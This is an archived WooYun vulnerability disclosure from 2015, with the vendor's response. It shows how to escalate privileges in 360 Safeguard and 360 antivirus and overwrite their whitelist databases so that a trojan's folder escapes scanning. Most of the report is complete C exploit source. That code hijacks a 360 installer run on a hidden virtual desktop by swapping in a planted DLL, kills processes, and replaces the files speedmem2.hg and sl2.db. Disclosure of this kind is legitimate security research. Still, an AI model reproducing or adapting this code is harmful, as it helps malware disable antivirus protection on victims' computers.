乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-25: 细节已通知厂商并且等待厂商处理中 2015-02-26: 厂商已经确认,细节仅向厂商公开 2015-03-01: 细节向第三方安全合作伙伴开放 2015-04-22: 细节向核心白帽子及相关领域专家公开 2015-05-02: 细节向普通白帽子公开 2015-05-12: 细节向实习白帽子公开 2015-05-27: 细节向公众公开
提升权限将特定目录添加到360安全卫士和杀毒的白名单中。
通过创建虚拟桌面提升自身权限,释放原设定好的白名单数据库文件替换掉现有白名单数据库文件speedmem2.hg和sl2.db,达到添加制定目录为信任目录的结果,致使木马逃避掉360杀毒的扫描。
提升提升权限部分:
HINSTANCE hInstance = NULL;DWORD WINAPI MainBacak(LPVOID lpParameter){ SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS ); char MydirPath[MAX_PATH]; SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); CHAR MyDir[MAX_PATH]; wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); const int buf_size = 1024; CHAR buf[buf_size]; DWORD dwBufWrittenSize; HANDLE hDir; hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL); if (hDir == INVALID_HANDLE_VALUE) { CloseHandle(hDir); exit(0); } while(1) { if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE , FILE_NOTIFY_CHANGE_FILE_NAME| FILE_NOTIFY_CHANGE_DIR_NAME| FILE_NOTIFY_CHANGE_ATTRIBUTES| FILE_NOTIFY_CHANGE_SIZE| FILE_NOTIFY_CHANGE_LAST_WRITE| FILE_NOTIFY_CHANGE_LAST_ACCESS| FILE_NOTIFY_CHANGE_CREATION| FILE_NOTIFY_CHANGE_SECURITY, &dwBufWrittenSize, NULL, NULL)) { FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf; char* pszMultiByte; pszMultiByte = new char[512]; ZeroMemory( pszMultiByte, 512); WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL); char *p; p=strstr(pszMultiByte,"360net.dll"); if(p!=NULL) { char tmp360net[MAX_PATH]={0}; lstrcpy(tmp360net,pszMultiByte); switch(pfiNotifyInfo->Action) { case FILE_ACTION_ADDED: delete []pszMultiByte; break; case FILE_ACTION_REMOVED: delete []pszMultiByte; break; case FILE_ACTION_MODIFIED: lstrcat(MyDir,tmp360net); if (CopyFile("Dll.dll",MyDir,FALSE)!=0) { delete []pszMultiByte; CloseHandle(hDir); return 1; } else { delete []pszMultiByte; return 0; break; } default: break; } } } } CloseHandle(hDir); return 0; }DWORD WINAPI MainDesk(LPVOID lpParameter){ HDESK hDesk = CreateDesktop("Virtual", NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, DESKTOP_CREATEWINDOW| DESKTOP_ENUMERATE| DESKTOP_READOBJECTS| DESKTOP_WRITEOBJECTS| DESKTOP_HOOKCONTROL , NULL ); STARTUPINFO si = {sizeof(si)}; si.lpDesktop = "Virtual"; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; PROCESS_INFORMATION pi = {0}; if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); CloseDesktop(hDesk); return 0; } return 1;}int main(int argc, char* argv[]){ char safe[MAX_PATH]; HKEY hkey; DWORD type = REG_SZ; DWORD buffSize=sizeof(safe); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } } char tmp360safe[MAX_PATH]={0}; lstrcpy(tmp360safe,safe); lstrcat(tmp360safe,"\\modules\\360Inst.exe"); char MyDir[MAX_PATH]; SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0); strcat(MyDir,"\\Local Settings\\Temp\\"); MessageBox(NULL,MyDir,NULL,NULL); ExitProcess(0); if (access(tmp360safe,0)==0) { while(1) { HANDLE handle[2]; handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL); SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST); ResumeThread(handle[1]); handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL); SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST); ResumeThread(handle[2]); WaitForSingleObject(handle[2],INFINITE); DWORD lpExitCode2; GetExitCodeThread(handle[2],&lpExitCode2); if (lpExitCode2==0) { CloseHandle(handle[2]); CloseHandle(handle[1]); continue; } WaitForSingleObject(handle[1],INFINITE); DWORD lpExitCode; GetExitCodeThread(handle[1],&lpExitCode); if (lpExitCode==1) { CloseHandle(handle[1]); CloseHandle(handle[2]); Sleep(15000); } else { CloseHandle(handle[1]); CloseHandle(handle[2]); } } } return 0;}
替换白名单数据库部分:
int Storm(int count){ unsigned long Time=GetTickCount(); int seed=rand()+3; seed=(seed*Time)%count; return seed;}BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)//回调函数{ PostMessage(hwnd, WM_CLOSE, 0, 0); return TRUE;}extern "C" __declspec(dllexport)void HttpCreateDownloadObj(){ char taskkill[MAX_PATH]; wsprintf(taskkill,"taskkill /im load.exe /f"); WinExec(taskkill,SW_HIDE); EnumWindows(EnumWindowsProc,0); char safe[MAX_PATH]; char SD[MAX_PATH]; HKEY hkey; DWORD type = REG_SZ; DWORD buffSize=sizeof(safe); DWORD buffSize1=sizeof(SD); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } } if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1); RegCloseKey(hkey); } } char tmp360safe[MAX_PATH]={0}; lstrcpy(tmp360safe,safe); lstrcat(tmp360safe,"\\modules\\360Inst.exe"); char MydirPath[MAX_PATH]; SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); CHAR MyDir[MAX_PATH]; wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); CHAR speedmem[MAX_PATH]; wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26)); CHAR slD[MAX_PATH]; wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26)); speedmemSaveFile(speedmem); sdSaveFile(slD); CHAR Newspeedmem[MAX_PATH]; wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe); CHAR NewslD[MAX_PATH]; wsprintf(NewslD,"%s\\sl2.db",SD); DeleteFile(Newspeedmem); DeleteFile(NewslD); CopyFile(speedmem,Newspeedmem,FALSE); CopyFile(slD,NewslD,FALSE); DeleteFile(speedmem); DeleteFile(slD); return;}
speedmemSaveFile与sdSaveFile分别是生成了之前在360杀毒和360安全卫视下设定好路径的白名单数据库文件。
你们自然晓得怎么修复啦:P
危害等级:中
漏洞Rank:10
确认时间:2015-02-26 10:17
感谢乌云白帽子的报告此问题是通过360安全卫士中一处防御缺陷突破信任机制实现的白名单篡改。 我们在一个月以前就已经从其它渠道获知了该漏洞并进行了修复和升级,目前外网的最新版360都不存在此问题。
暂无
